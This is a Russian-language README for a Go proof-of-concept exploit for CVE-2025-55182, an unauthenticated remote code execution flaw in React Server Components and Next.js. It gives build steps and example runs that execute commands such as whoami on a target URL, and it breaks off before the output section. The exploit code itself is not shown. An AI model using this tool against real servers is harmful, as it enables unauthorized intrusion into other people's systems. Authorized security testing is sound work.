
Эксплойт для уязвимости React2Shell RCE (CVE-2025-55182), затрагивающий React Server Components 19.0.0-19.2.0. Использует небезопасную десериализацию для неаутентифицированного удаленного выполнения кода.
Proof of Concept (PoC) для уязвимости удаленного выполнения кода в React Server Components (RSC) / Next.js.
В React Server Components версий 19.0.0, 19.1.0, 19.1.1 и 19.2.0, включая пакеты react-server-dom-parcel, react-server-dom-turbopack и react-server-dom-webpack, существует предварительно аутентифицированная уязвимость удаленного выполнения кода. Уязвимый код небезопасно десериализует полезные данные из HTTP-запросов к конечным точкам Server Function.
⚠️ ПРЕДУПРЕЖДЕНИЕ: Этот инструмент предназначен только для авторизованного тестирования безопасности.
go build -o exploit exploit.go
Или запустите напрямую:
go run exploit.go
./exploit -u <URL> -c <команда>
-u — целевой URL (обязательно)-c — команда для выполнения (по умолчанию: id)# Базовое использование
./exploit -u https://vulnerable -c "whoami"
# Выполнить другую команду
./exploit -u https://vulnerable -c "ls -la"
# Запуск напрямую через go
go run exploit.go -u https://vulnerable -c "pwd"

Инструмент выводит: